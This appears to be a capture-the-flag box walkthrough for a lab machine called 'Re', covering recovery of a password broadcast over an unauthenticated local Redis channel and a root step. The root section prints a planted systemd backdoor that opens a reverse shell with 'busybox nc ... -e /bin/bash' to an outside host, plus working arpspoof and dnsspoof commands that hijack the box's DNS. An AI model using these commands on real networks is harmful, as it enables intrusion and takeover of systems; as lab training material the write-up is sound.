title: 'Group-member box: Re'
date: 2026-03-25 01:10:52
categories: Box walkthroughs
tags:
- Box walkthroughs
- wp
- group-member box
top_img: /img/top.jpg
Re
Box name: Re
Author: the group owner
Box ID: 619
Difficulty: easy
Box URL: https://maze-sec.com
Box IP: 192.168.1.124
Attacker IP: 192.168.1.195 (Kali Linux)
user
For the user flag, just SSH in: the login banner hands you the account name and password (the password is shown masked here).

```
┌──(root㉿Gropers)-[~]
└─# ssh sublarge@192.168.1.124
 __  __                    ____
|  \/  | __ _ _______     / ___|  ___  ___
| |\/| |/ _` |_  / _ \____\___ \ / _ \/ __|
| |  | | (_| |/ /  __/_____|__) |  __/ (__
|_|  |_|\__,_/___\___|    |____/ \___|\___|
username: sublarge
password: ********
sublarge@192.168.1.124's password:
```

User submini
ss -tulnp shows the box listening on 6379 (Redis), bound to localhost only:

```
sublarge@Re:~$ ss -tulnp
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0            0.0.0.0:68        0.0.0.0:*
tcp   LISTEN 0      128        127.0.0.1:6379      0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*
tcp   LISTEN 0      128            [::1]:6379         [::]:*
tcp   LISTEN 0      128                *:80             *:*
tcp   LISTEN 0      128             [::]:22            [::]:*
```

Open redis-cli and run MONITOR. The server accepts the connection without AUTH and lets an unprivileged local user run MONITOR, so every command it receives is visible. The capture shows a background publisher.py slowly broadcasting to the channel chan5, one character every five seconds.
Piecing the characters together yields a 20-character string:

```
sublarge@Re:~$ redis-cli
127.0.0.1:6379> MONITOR
OK
1775050053.331070 [0 [::1]:34418] "PUBLISH" "chan5" "7"
1775050058.335378 [0 [::1]:34418] "PUBLISH" "chan5" "U"
1775050058.336169 [0 [::1]:49944] "PING"
1775050058.336266 [0 [::1]:49944] "PUBLISH" "chan5" "r"
1775050063.339469 [0 [::1]:49944] "PUBLISH" "chan5" "R"
1775050068.343068 [0 [::1]:49944] "PUBLISH" "chan5" "p"
1775050073.347848 [0 [::1]:49944] "PUBLISH" "chan5" "G"
1775050078.351404 [0 [::1]:49944] "PUBLISH" "chan5" "7"
1775050083.355365 [0 [::1]:49944] "PUBLISH" "chan5" "u"
1775050088.360359 [0 [::1]:49944] "PUBLISH" "chan5" "r"
1775050093.363254 [0 [::1]:49944] "PUBLISH" "chan5" "4"
1775050098.367301 [0 [::1]:49944] "PUBLISH" "chan5" "Z"
1775050103.371106 [0 [::1]:49944] "PUBLISH" "chan5" "p"
1775050108.375034 [0 [::1]:49944] "PUBLISH" "chan5" "z"
1775050113.379080 [0 [::1]:49944] "PUBLISH" "chan5" "G"
1775050118.382983 [0 [::1]:49944] "PUBLISH" "chan5" "7"
1775050123.387316 [0 [::1]:49944] "PUBLISH" "chan5" "Q"
1775050128.391071 [0 [::1]:49944] "PUBLISH" "chan5" "I"
1775050133.395326 [0 [::1]:49944] "PUBLISH" "chan5" "z"
1775050138.399519 [0 [::1]:49944] "PUBLISH" "chan5" "4"
1775050143.403189 [0 [::1]:49944] "PUBLISH" "chan5" "H"
1775050148.407298 [0 [::1]:49944] "PUBLISH" "chan5" "7"
1775050153.411495 [0 [::1]:49944] "PUBLISH" "chan5" "U"
1775050153.412481 [0 [::1]:49046] "PING"
1775050153.412592 [0 [::1]:49046] "PUBLISH" "chan5" "r"
```

Feeding this to an AI gets you the complete string: rRpG7ur4ZpzG7QIz4H7U. The capture actually contains the boundary on its own: both times a new client port appears and sends PING, the very next PUBLISH is r, and exactly 20 characters lie between the two reconnects, so the string starts at r.
That is the password of user submini.
But there is a point the box author wanted to make: how do you recover this string without AI?
Regex
If we simply SUBSCRIBE to chan5 we get the characters starting at whatever point in the cycle we joined, and we still have to extract them:

```
sublarge@Re:~$ redis-cli
127.0.0.1:6379> SUBSCRIBE chan5
Reading messages... (press Ctrl-C to quit)
1) "subscribe"
2) "chan5"
3) (integer) 1
1) "message"
2) "chan5"
3) "z"
1) "message"
2) "chan5"
3) "4"
1) "message"
2) "chan5"
3) "H"
1) "message"
2) "chan5"
3) "7"
1) "message"
2) "chan5"
3) "U"
1) "message"
2) "chan5"
3) "r"
1) "message"
2) "chan5"
3) "R"
1) "message"
2) "chan5"
3) "p"
1) "message"
2) "chan5"
3) "G"
1) "message"
2) "chan5"
3) "7"
1) "message"
2) "chan5"
3) "u"
1) "message"
2) "chan5"
3) "r"
1) "message"
2) "chan5"
3) "4"
1) "message"
2) "chan5"
3) "Z"
1) "message"
2) "chan5"
3) "p"
1) "message"
2) "chan5"
3) "z"
1) "message"
2) "chan5"
3) "G"
1) "message"
2) "chan5"
3) "7"
1) "message"
2) "chan5"
3) "Q"
1) "message"
2) "chan5"
3) "I"
1) "message"
2) "chan5"
3) "z"
1) "message"
2) "chan5"
3) "4"
1) "message"
2) "chan5"
3) "H"
^C
sublarge@Re:~$
```

Once the output starts repeating (z 4 H again) you can stop.
Save the captured output, with the repeated tail removed, into a file a.
Then pull out the payload lines with cat a|grep '<pattern>', where the pattern is the feature shared by the lines you want, here the 3) " prefix:

```
┌──(root㉿Gropers)-[~]
└─# cat a|grep '3) "'
3) "z"
3) "4"
3) "H"
3) "7"
3) "U"
3) "r"
3) "R"
3) "p"
3) "G"
3) "7"
3) "u"
3) "r"
3) "4"
3) "Z"
3) "p"
3) "z"
3) "G"
3) "7"
3) "Q"
3) "I"
```

Next, split on the double quote and print the second field to get the characters themselves:

```
┌──(root㉿Gropers)-[~]
└─# cat a|grep '3) "'|awk -F'"' '{printf $2}'
z4H7UrRpG7ur4ZpzG7QI
```

awk's print would add a newline after every character; printf does not, but then nothing terminates the line and the shell prompt lands right after the output. Adding END{print x} (x is unset, so print emits just a newline) closes the line cleanly:

```
cat a|grep '3) "'|awk -F'"' '{printf $2}END{print x}'
```

(Using $2 as the printf format string is harmless here because the payloads are single characters; if a payload could contain %, write printf "%s", $2 instead.)
Pure regex
A lookbehind/lookahead with grep -o does the extraction in one step:

```
cat a|grep -P '(?<=^3\) ").(?=")' -o
```

This gives the password characters, one per line, but still in the rotated order.
Doubling the string and slicing it with cut -c $i-$((i+19)) for i from 1 to 20 yields every possible start position:

```
┌──(root㉿Gropers)-[~]
└─# for i in {1..20};do echo z4H7UrRpG7ur4ZpzG7QIz4H7UrRpG7ur4ZpzG7QI|cut -c $i-$((i+19));done > pass.txt
┌──(root㉿Gropers)-[~]
└─# cat pass.txt
z4H7UrRpG7ur4ZpzG7QI
4H7UrRpG7ur4ZpzG7QIz
H7UrRpG7ur4ZpzG7QIz4
7UrRpG7ur4ZpzG7QIz4H
UrRpG7ur4ZpzG7QIz4H7
rRpG7ur4ZpzG7QIz4H7U
RpG7ur4ZpzG7QIz4H7Ur
pG7ur4ZpzG7QIz4H7UrR
G7ur4ZpzG7QIz4H7UrRp
7ur4ZpzG7QIz4H7UrRpG
ur4ZpzG7QIz4H7UrRpG7
r4ZpzG7QIz4H7UrRpG7u
4ZpzG7QIz4H7UrRpG7ur
ZpzG7QIz4H7UrRpG7ur4
pzG7QIz4H7UrRpG7ur4Z
zG7QIz4H7UrRpG7ur4Zp
G7QIz4H7UrRpG7ur4Zpz
7QIz4H7UrRpG7ur4ZpzG
QIz4H7UrRpG7ur4ZpzG7
Iz4H7UrRpG7ur4ZpzG7Q
```

Brute-forcing submini's login with these 20 candidates gives the correct password (the sixth line, rRpG7ur4ZpzG7QIz4H7U).
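The grep/awk/cut pipeline above, written out as an offline script so the whole "no AI" recovery can be reproduced and checked. This is an added example, not code from the box or from the writeup's author. It parses MONITOR and SUBSCRIBE output, finds the cycle length by looking for the point where the capture starts repeating, uses the reconnect (new client port followed by PING) that MONITOR exposes to fix the start of the string, and falls back to generating all rotations, the same thing the doubled-string cut loop does, when only SUBSCRIBE output is available. The MONITOR transcript it runs on is constructed in the same shape as the capture on the page; the 20-character cycle it embeds is the one recovered above.

```python
import re

# The cycle recovered on the page; used only to build the constructed transcript.
SECRET = "rRpG7ur4ZpzG7QIz4H7U"

MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
SUBSCRIBE_RE = re.compile(r'^3\) "(.*)"$')


def _mon(ts, port, *args):
    return f'{ts:.6f} [0 [::1]:{port}] ' + " ".join(f'"{a}"' for a in args)


def build_sample_monitor():
    """Constructed `redis-cli MONITOR` transcript shaped like the one on the box:
    last two chars of a cycle from client :34418, a reconnect (client :49944
    sends PING) followed by a full cycle, then the next reconnect."""
    lines, ts = ["OK"], 1775050053.331070
    for port, chars, reconnect in ((34418, SECRET[-2:], False),
                                   (49944, SECRET, True),
                                   (49046, SECRET[:1], True)):
        if reconnect:
            lines.append(_mon(ts, port, "PING"))
        for ch in chars:
            lines.append(_mon(ts, port, "PUBLISH", "chan5", ch))
            ts += 5.0
    return "\n".join(lines)


def parse_monitor(text):
    """MONITOR output -> [(client, COMMAND, [args...]), ...]; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = MONITOR_RE.match(line.strip())
        if not m:
            continue
        args = ARG_RE.findall(m.group("rest"))
        if args:
            events.append((m.group("client"), args[0].upper(), args[1:]))
    return events


def published_chars(events, channel="chan5"):
    """Payloads of every PUBLISH to `channel`, in capture order."""
    return [a[1] for _, cmd, a in events
            if cmd == "PUBLISH" and len(a) == 2 and a[0] == channel]


def find_period(chars, min_extra=3):
    """Smallest p such that the capture repeats every p characters. At least
    `min_extra` chars beyond one full period are required, so a short capture
    cannot be mistaken for a shorter cycle."""
    n = len(chars)
    for p in range(1, n - min_extra + 1):
        if all(chars[i] == chars[i + p] for i in range(n - p)):
            return p
    raise ValueError("capture too short to determine the period; keep MONITOR running")


def cycle_start_after_ping(events, channel="chan5"):
    """Index into published_chars() of the first PUBLISH a client sends right
    after its PING: publisher.py reconnects at the start of each cycle, so that
    character is the first of the secret. None if no PING was captured."""
    last_cmd, idx = {}, 0
    for client, cmd, args in events:
        if cmd == "PUBLISH" and len(args) == 2 and args[0] == channel:
            if last_cmd.get(client) == "PING":
                return idx
            idx += 1
        last_cmd[client] = cmd
    return None


def recover_secret(monitor_text, channel="chan5"):
    """Period detection plus the reconnect marker -> the secret in its real order."""
    events = parse_monitor(monitor_text)
    chars = published_chars(events, channel)
    period = find_period(chars)
    start = cycle_start_after_ping(events, channel) or 0
    return "".join((chars * 2)[start:start + period])


def rotations(s):
    """Every cyclic shift of s: the doubled-string `cut -c $i-$((i+19))` trick."""
    return [(s + s)[i:i + len(s)] for i in range(len(s))]


def parse_subscribe(text, channel="chan5"):
    """`redis-cli SUBSCRIBE` output -> payloads. Each message is the triple
    1) "message" / 2) "<channel>" / 3) "<payload>"; the subscribe ack is skipped."""
    lines = [l.strip() for l in text.splitlines()]
    out = []
    for i in range(len(lines) - 2):
        if lines[i] == '1) "message"' and lines[i + 1] == f'2) "{channel}"':
            m = SUBSCRIBE_RE.match(lines[i + 2])
            if m:
                out.append(m.group(1))
    return out


if __name__ == "__main__":
    print(recover_secret(build_sample_monitor()))
    # With plain SUBSCRIBE output there is no reconnect marker: try every rotation.
    for candidate in rotations("z4H7UrRpG7ur4ZpzG7QI"):
        print(candidate)
```

Pipe a real capture in (`redis-cli MONITOR | tee mon.txt`, then `recover_secret(open("mon.txt").read())`) and the script stops needing the constructed sample; `find_period` deliberately refuses to answer until it has seen one full cycle plus a few characters, which is the same "wait for the repeat" rule used manually above.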
root
The complete chain, taken from group member mooi's writeup:
1. Redis goes down -> 2. publisher.py errors out and exits -> 3. systemd triggers the root backdoor -> 4. the box does a DNS lookup -> 5. Kali forges the answer and receives the reverse connection.
Reading /usr/local/bin/publisher.py shows that if the Redis connection fails (redis.ConnectionError) the script simply calls sys.exit(1) and dies.
Guessing that it runs as a systemd service, look for its unit file.
/etc/systemd/system/redis-publisher.service has a backdoor left in it:

```
submini@Re:/etc/systemd/system$ cat redis-publisher.service
......
ExecStopPost=/bin/bash -c '/usr/bin/busybox nc dev.warning.dsz 1234 -e /bin/bash'
......
```

ExecStopPost runs every time the service stops, whether it was stopped cleanly or exited with an error, and the unit runs as root. So as soon as this service stops or crashes, the system opens a reverse shell as root to port 1234 of dev.warning.dsz.
Local network hijack (ARP & DNS spoofing)
The goal of this step is to make the box believe that Kali's IP is the real address behind the domain dev.warning.dsz.
It takes three terminals on Kali.
Terminal A:

```
┌──(root㉿Gropers)-[~]
└─# vim fake_dns.txt
┌──(root㉿Gropers)-[~]
└─# cat fake_dns.txt
192.168.1.195 dev.warning.dsz
┌──(root㉿Gropers)-[~]
└─# sudo dnsspoof -i eth0 -f fake_dns.txt
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.195]
```

Terminal B:

```
┌──(root㉿Gropers)-[~]
└─# sudo arpspoof -i eth0 -t 192.168.1.124 192.168.1.1
0:c:29:ee:66:e3 8:0:27:f6:43:fe 0806 42: arp reply 192.168.1.1 is-at 0:c:29:ee:66:e3
```

Terminal C:

```
┌──(root㉿Gropers)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
```

Poisoning only the box's ARP entry for the gateway (arpspoof -t 192.168.1.124 192.168.1.1) is enough: the box's outbound DNS query is now sent to Kali's MAC, dnsspoof sees it and replies with 192.168.1.195. The capture filter dnsspoof prints excludes Kali's own source address, so it does not answer its own lookups.
At the same time, from the submini shell on the box, tell Redis to stop (add nosave so the shutdown is not aborted by a failed RDB save):

```
redis-cli shutdown nosave
```

After that, wait for the restart and the reverse shell lands in terminal C.
Be aware that the service restarts again, so the shell drops after a short while; just issue the Redis stop command once more to get a fresh one.